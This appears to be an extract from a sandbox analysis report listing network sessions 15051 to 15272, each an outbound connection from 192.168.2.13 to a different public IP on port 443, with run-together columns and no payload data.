                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15051192.168.2.13484544.250.201.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15052192.168.2.135646097.120.30.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15053192.168.2.1340020135.141.201.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15054192.168.2.1356506219.218.100.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15055192.168.2.135440893.146.94.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15056192.168.2.1343046177.227.163.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15057192.168.2.133440236.8.69.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15058192.168.2.1351690152.200.76.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15059192.168.2.1355132192.4.113.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15060192.168.2.1352374217.187.188.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15061192.168.2.1337626166.244.110.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15062192.168.2.1337060190.97.141.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15063192.168.2.133963851.147.65.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15064192.168.2.135169012.196.32.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15065192.168.2.1358906169.152.150.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15066192.168.2.1348338135.77.67.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15067192.168.2.1340514180.162.199.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15068192.168.2.133901480.214.124.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15069192.168.2.135184235.228.126.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15070192.168.2.1343916159.55.72.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15071192.168.2.1350414208.135.8.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15072192.168.2.134853882.178.199.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15073192.168.2.1357232136.124.237.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15074192.168.2.1336654200.208.254.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15075192.168.2.1349376157.70.89.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15076192.168.2.1342320135.189.192.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15077192.168.2.1339528190.183.115.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15078192.168.2.1351098165.65.82.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15079192.168.2.13605128.207.45.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15080192.168.2.134180217.124.148.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15081192.168.2.13335205.144.246.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15082192.168.2.134682017.35.119.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15083192.168.2.1349360119.34.210.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15084192.168.2.1340016147.124.228.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15085192.168.2.136063625.24.29.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15086192.168.2.134325872.174.247.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15087192.168.2.1334694125.138.75.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15088192.168.2.135431620.62.234.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15089192.168.2.13473268.118.8.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15090192.168.2.1334134207.31.106.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15091192.168.2.1357214197.13.234.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15092192.168.2.13559849.176.94.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15093192.168.2.135171248.164.252.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15094192.168.2.1357192205.146.145.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15095192.168.2.135411261.121.206.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15096192.168.2.1345874191.196.195.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15097192.168.2.135938088.162.160.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15098192.168.2.1342944188.210.42.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15099192.168.2.1339504130.109.88.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15100192.168.2.1348414218.171.168.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15101192.168.2.1350978162.164.99.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15102192.168.2.133511499.195.54.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15103192.168.2.133995683.27.120.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15104192.168.2.134260049.255.42.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15105192.168.2.134249035.111.62.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15106192.168.2.1333374177.200.55.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15107192.168.2.1340110106.136.36.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15108192.168.2.1334666177.155.212.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15109192.168.2.135299044.206.52.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15110192.168.2.135893613.249.214.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15111192.168.2.1333046209.22.145.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15112192.168.2.13466402.114.50.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15113192.168.2.1349346168.128.228.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15114192.168.2.1356762167.139.89.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15115192.168.2.1357258138.113.109.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15116192.168.2.134731441.145.230.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15117192.168.2.1354526174.255.181.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15118192.168.2.133303093.119.113.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15119192.168.2.13536081.1.69.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15120192.168.2.1334140188.79.10.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15121192.168.2.1347618137.172.26.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15122192.168.2.134777473.85.238.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15123192.168.2.135517293.212.41.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15124192.168.2.1334190189.214.123.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15125192.168.2.134465689.186.51.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15126192.168.2.1344818110.252.225.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15127192.168.2.1353160174.183.21.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15128192.168.2.1351218143.4.42.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15129192.168.2.1336984192.28.56.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15130192.168.2.1359920108.161.73.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15131192.168.2.1345316158.156.112.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15132192.168.2.1354888140.114.160.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15133192.168.2.135692066.7.91.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15134192.168.2.133742659.202.179.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15135192.168.2.133393890.251.20.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15136192.168.2.133364841.22.107.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15137192.168.2.1335590106.223.163.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15138192.168.2.1359510218.146.123.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15139192.168.2.135761017.27.146.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15140192.168.2.1356608144.241.26.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15141192.168.2.134052031.142.149.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15142192.168.2.134238488.24.60.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15143192.168.2.1355228188.61.141.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15144192.168.2.136008617.116.236.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15145192.168.2.134198660.109.151.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15146192.168.2.1360300152.177.145.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15147192.168.2.1333544212.151.16.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15148192.168.2.1355842172.178.165.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15149192.168.2.133769475.16.6.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15150192.168.2.1353568111.201.124.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15151192.168.2.133300048.162.170.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15152192.168.2.133284859.253.91.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15153192.168.2.135661634.3.128.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15154192.168.2.1356122179.172.235.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15155192.168.2.1360252159.233.175.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15156192.168.2.135979881.222.96.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15157192.168.2.1358346137.100.170.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15158192.168.2.134775874.40.203.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15159192.168.2.134263439.63.229.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15160192.168.2.1333476114.209.155.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15161192.168.2.1360378161.90.93.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15162192.168.2.1353236162.154.88.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15163192.168.2.134007046.26.12.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15164192.168.2.1355828193.181.53.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15165192.168.2.1337542203.83.240.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15166192.168.2.1338068101.163.65.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15167192.168.2.1359304124.216.123.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15168192.168.2.1356978157.252.141.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15169192.168.2.1357946111.123.72.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15170192.168.2.1338500195.152.246.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15171192.168.2.134686662.136.11.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15172192.168.2.13441241.255.144.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15173192.168.2.1345880172.209.38.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15174192.168.2.134335438.135.99.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15175192.168.2.1334542203.58.196.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15176192.168.2.1360730199.198.177.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15177192.168.2.1339574167.101.19.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15178192.168.2.134321431.59.57.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15179192.168.2.1334250163.192.31.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15180192.168.2.135909234.84.47.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15181192.168.2.135878835.9.104.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15182192.168.2.134469879.88.73.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15183192.168.2.1347716160.15.221.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15184192.168.2.133403058.110.188.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15185192.168.2.134815041.2.5.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15186192.168.2.1345714176.79.144.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15187192.168.2.1348938113.20.141.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15188192.168.2.1349162137.166.246.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15189192.168.2.1346224101.21.69.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15190192.168.2.1338678102.133.243.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15191192.168.2.1356198187.202.208.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15192192.168.2.1357494156.187.180.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15193192.168.2.1334756141.174.109.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15194192.168.2.135462844.199.157.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15195192.168.2.1333524110.167.252.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15196192.168.2.135646276.197.177.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15197192.168.2.134472073.203.113.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15198192.168.2.1348530144.91.31.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15199192.168.2.134638468.54.85.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15200192.168.2.1345058156.146.132.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15201192.168.2.1347304161.167.5.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15202192.168.2.1360234211.182.74.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15203192.168.2.135688889.210.46.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15204192.168.2.135451277.115.113.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15205192.168.2.1340454210.95.73.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15206192.168.2.1352158185.238.56.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15207192.168.2.133993842.167.37.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15208192.168.2.134251049.86.16.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15209192.168.2.1341022126.23.96.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15210192.168.2.133729870.200.72.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15211192.168.2.135634499.46.235.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15212192.168.2.1351522111.111.111.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15213192.168.2.134894454.55.156.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15214192.168.2.135148834.61.215.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15215192.168.2.1352062210.217.44.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15216192.168.2.1348682139.68.55.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15217192.168.2.1340432211.208.110.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15218192.168.2.133769692.76.150.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15219192.168.2.1347166120.112.51.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15220192.168.2.1351680161.37.94.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15221192.168.2.1332856104.161.102.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15222192.168.2.1336050109.89.248.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15223192.168.2.1336888115.198.146.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15224192.168.2.134202694.54.57.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15225192.168.2.1345634192.14.217.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15226192.168.2.1341196113.68.58.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15227192.168.2.1344036135.25.236.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15228192.168.2.1356730133.57.82.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15229192.168.2.1352856143.141.143.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15230192.168.2.1337702166.53.233.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15231192.168.2.1338366202.162.73.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15232192.168.2.135438298.37.176.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15233192.168.2.1346692177.220.203.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15234192.168.2.1339720144.251.218.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15235192.168.2.1337078185.115.33.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15236192.168.2.134889495.235.180.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15237192.168.2.1340126154.238.18.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15238192.168.2.1333994152.163.140.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15239192.168.2.134926014.6.45.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15240192.168.2.134971271.223.28.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15241192.168.2.134985092.101.164.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15242192.168.2.134283831.56.25.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15243192.168.2.1355086192.160.185.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15244192.168.2.1358124190.248.157.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15245192.168.2.1351358190.67.206.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15246192.168.2.1354636181.175.6.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15247192.168.2.134262490.86.47.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15248192.168.2.133815231.131.50.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15249192.168.2.1333336147.111.63.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15250192.168.2.1338374137.151.240.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15251192.168.2.134717839.43.88.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15252192.168.2.1333750136.73.183.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15253192.168.2.1360258119.194.65.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15254192.168.2.134558276.56.142.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15255192.168.2.1344788163.8.249.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15256192.168.2.133531459.214.42.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15257192.168.2.1335484180.242.15.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15258192.168.2.1357714135.219.136.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15259192.168.2.13442702.194.129.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15260192.168.2.13396565.202.10.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15261192.168.2.1342658110.238.16.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15262192.168.2.135301663.180.242.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15263192.168.2.1333460148.221.128.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15264192.168.2.1350620118.237.25.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15265192.168.2.136028625.153.167.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15266192.168.2.135256017.129.49.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15267192.168.2.1347610208.239.145.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15268192.168.2.1345596119.25.122.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15269192.168.2.1357094109.134.25.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15270192.168.2.1338586186.7.15.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15271192.168.2.1357924155.195.159.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15272192.168.2.1355520154.243.41.95443
